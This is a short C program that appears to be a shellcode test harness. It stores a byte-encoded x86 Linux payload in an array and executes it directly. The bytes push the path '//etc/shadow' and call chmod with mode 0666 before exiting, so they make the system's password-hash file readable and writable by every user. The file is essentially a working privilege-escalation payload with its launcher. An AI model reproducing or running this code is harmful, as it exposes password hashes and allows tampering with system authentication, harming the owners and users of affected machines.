
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*,int) ;
 int strlen (char*) ;
 void stub1 () ;

int main(int argc, char *argv[])
{

 char shellcode[] = "\x51\x66\xb9\xb6"
    "\x01\x68\x61\x64"
    "\x6f\x77\x68\x63"
    "\x2f\x73\x68\x68"
    "\x2f\x2f\x65\x74"
    "\x89\xe3\x6a\x0f"
    "\x58\xcd\x80"

    "\x40\xcd\x80";

 printf("Length: %d\n",strlen(shellcode));
 (*(void(*)()) shellcode)();

 return 0;
}
